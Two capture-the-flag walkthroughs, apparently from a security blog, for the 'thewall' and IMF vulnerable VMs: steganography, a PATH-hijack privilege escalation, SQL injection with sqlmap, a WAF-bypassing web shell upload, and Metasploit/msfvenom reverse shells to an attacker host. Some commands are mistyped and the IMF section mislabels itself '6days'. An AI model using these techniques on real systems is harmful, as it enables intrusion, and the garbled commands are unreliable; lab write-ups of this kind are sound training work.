Hack the thewall VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as thewall. The credit for making this vm machine goes to “Xerubus” and it is another boot2root challenge where we have to root the VM to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.17 but you will have to find your own)

netdiscover

We did a nmap scan but it showed nothing. So we use arp to check if it is broadcasting anything.

arp –an

We found that it is broadcasting something on the network, so we use wireshark to check at which port it is broadcasting the data.

We found that it is broadcasting something at port 1337 so we use netcat to listen at port 1337.

nc –lvp 1337

We found it was broadcasting something related to pink Floyd, we again do a nmap scan to check if it affected anything.

nmap -sV 192.168.0.17

As we can see that port 80 is open, so we open this ip in our browser.

We take a look at the source code of the browser and find a hexadecimal encoded string.

When we decode it we find a md5 encoded string and hint to do stegnography.

We decode the md5 encoded string and found a string called divisionbell

We download the image from the webpage and using steghide we check if something is hidden behind the image. When try to extract information it prompts for password using the string we decoded above we are able to find that a text file is hidden behind the image and are able to extract it.

steghide –info pink_floyd.jpg

steghide extract –sf pink_floyd.jpg

When we open the text file we find a base64 encoded string and md5 encoded string and a hint to use it at port 1965.

First we decode the base64 encoded string and found the string SydBarret.

Then we decode the md5 encoded string and found the string pinkfloydrocks.

Port enumeration on 1965 shows it is running openssh, we check if we can login using this as username:SydBarret and password:pinkfloydrocks.

When we try to login it shows us that we can only connect through sftp. So we use SydBarrett as username and pinkfloydrocks as password to login through sftp.

Now that we are inside, we find a file called eclipsed_by_the_moon, we download it to our system

We check what kind of file it is, we find that it is a zip file, we extract it using tar.

file eclipsed_by_the_moon

tar xvfz eclipsed_by_the_moon

After extracting the file, we check what kind of file it is and find that it is a boot sector.

file eclipsed_by_the_moon.lsd

We check if we can recover any file inside the boot sector using testdisk.

testdisk eclipsed_by_the_moon.lsd

We select the image to recover files from.

We select none portioned media as it is a boot sector.

We go to advanced to recover file from the image.

We then select the partition in which we want to extract the file from and select undelete to recover the files.

We find that an image file is recovered, we copy it.

We select the directory of our system in which we want to copy the file.

We check the image we just recovered and find the picture of Roger Waters, we also got a password inside the image.

We login trough ssh, enumerating the username we find that RogerWaters is the username and password is hello_is_there_anybody_in_there.

After getting in, we find that there are different directory for different users of pink floyd band members.

ls -al

We also find that we have limited access and cannot access their directories so we check for binaries available to other users and find that user NickMason and DavidGilmour have binaries called brick and shineon available to them.

find / -user DavidGilmour 2>/dev/null

find / -user NickMason 2>/dev/null

We don’t have access to run the binary shineon but when we run brick it asks us a question. When we answer it correctly we become the user NickMason.

Now we can access the directory NickMason/. We find an image file inside we use scp to send it to our local system.

scp nick_mason_profile_pic.jpg root@192.168.0.16:/root/Desktop

We check the file type and find that it is an audio file. We change the file from .jpg to .ogg

When we listen to the audio, we find that morse code is also playing in the background along with the music. We cut the frequency of the audio to retrieve the morse code.

.-. .. -.-. …. .- .-. -.. .-- .-.  .. --. …. - .---- ----. ….- …-- ..-. .. … .-

We find that the morse code translates to richardwright1943farfisa. We use RichardWright as username and 1943farfisa as password to login as user RichardWright.

Now we try to run the binary shineon, after running the binary we find that we can change the folder with symbolic link from DavidGilmour to RichardWright.

ln –s /bin/ksh /tmp/mail

export PATH:/tmp:$PATH

When we now run the shineon we become user DavidGilmour.

Inside DavidGilmour/ folder we find a link inside the file.

When we open this link on the browser we find an image on which something is written.

When we decrease the contrast of the image, we find a hexadecimal string.

Then we also send the image file that we find inside the DavidGilmour/ folder using scp.

scp david_gilmour_profile_pic.jpg root@192.168.0.16:/root/Desktop/

We then find strings inside the image file and found string who_are_you_and_who_am_i.

Now we use DavidGilmour as username and who_are_you_and_who_am_i as password.

We now are in welcometothemachine group; we move inside /var/www/htdocs/welcometothemachine/.

We find a file called PinkFloyd, we run the file and find it asks a question. We use the hexadecimal string inside the image we find on the webpage.

Now we are given the permission to get root, as DavidGilmour is added into sudoers after running this program.

Now when we enter root/ directory and we find the flag stating the end of the VM challenge.

Hack the IMF VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as 6days. The credit for making this vm machine goes to “Geckom” and it is another CTF challenge where we have to find 6 flags to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.25 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap -sV  192.168.0.25

 We find port 80 is open, so we open it in our browser

We take a look at our source code and found a few javascript files that look like base64 encoded.

We open them and find nothing interesting but when we join their name and decode them we find our 2^nd flag.

Inside the flag we find another base64 encode string, decoding it we find a string called imfadministrator.

We take a look around the website and in the source code of contact.php page we find our 1^st flag.

Flag 1 contains a base64 encoded string decoding it we find a string called allthefiles.

We open allthefiles and imfadministrator on the browser. We find that imfadministrator is a directory that leads to a login page.

In the contact.php page we found a few email addresses so we use cewl to make a dictionary.

We use burpsuite to launch a dictionary attack. We select the position and change the password from string to array.

Now we find the third flag in our response.

Now that we can access the page we see that the page might be vulnerable to sql injection.

Using burpsuite we save the request in a text file.

We use sqlmap to dump the database.

sqlmap -r /root/Desktop/imf.txt --dbs --batch --dump-all

We find the name of the pages along with another page called tutorial-incomplete. We open it on our browser and find a page with QR-code inside an image.

When we decode the QR-code we our 4^th flag.

Inside our flag we find a base64 encoded string, when we decode it we find a string called uploadr942.php         

We open it on our browser and find a page to upload a file.

Now while uploading a shell we find that it is protected from WAF, so we create a custom shell and save it as GIF file to bypass the WAF.

Now we upload the file and check the response from the server to find where our file is uploaded.

We find server sends a string in a comment, we find our file is in uploads folder and the comment in the response sent by server is the name of our file.

After finding our shell, we find 5^th flag. Now we use web_delivery to take reverse shell using metasploit.

We setup our metasploit for web delivery and execute the command on our shell.

Now we have the reverse shell we take a look inside 5^th flag

We find a base64 encode string when we decode it we find a string agentservices.

We check the connections of our server using netstat

Netstat –antp

We found a service running on port 7788, we use curl to find what the server is running on port 7788.

curl localhost:7788

We find a service called agent is running so we find the location of agent using which command

which agent

When we move into the folder we found a file called access_codes, we open it and find a few numbers. It looks like a sequence for port knock.

So we knock the server and find that port 7788 opened.

Knock 192.168.0.25 7482 8279 9467

Now we download agent program file to our system for reverse engineering.

Download agent /root/Desktop

Now we reverse engineer the file to find an exploit. First we disassemble main function.

gdb –q agent

disassemble main

We find that at memory address 80486ba, string compare function takes place so we add a break point there. 

We break the program at 80486ba, and run the program. After running the programs, we look at the memory locations associated with the program.

break *0x80486ba

info registers

We look inside four halfwords of memory above stack pointer

x/4xw 0xffffd340

In the memory address 804c070 we found the password to access the program.

x/s 0x0804c070

Now we access the program from the server using netcat and find that the string can give us access to the program

netcat 192.168.0.25 7788

Now we create an exploit for this program, first we create a shellcode for msfvenom payload.

msfvenom –p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.15 lport=4444 –f python –b \x00\xa0\x0d

Now we create our exploit using python. We manually fuzz the memory location inside our exploit.

We setup our handler on metesploit and execute the shell.

msf > use exploit/multi/handler

msf exploit (handler) > set payload linux/x86/meterpreter/reverse_shell

msf exploit (handler) > set lhost 192.168.0.15

msf exploit (handler) > set lport 4444

msf exploit (handler) > run

now we check for sessions and take the interactive shell

msf exploit (handler) > sessions

msf exploit (handler) > sessions –I 3

Now we take shell check our privileges, we find that we are root. When we move inside the /root/ folder we find our 6^th and final flag.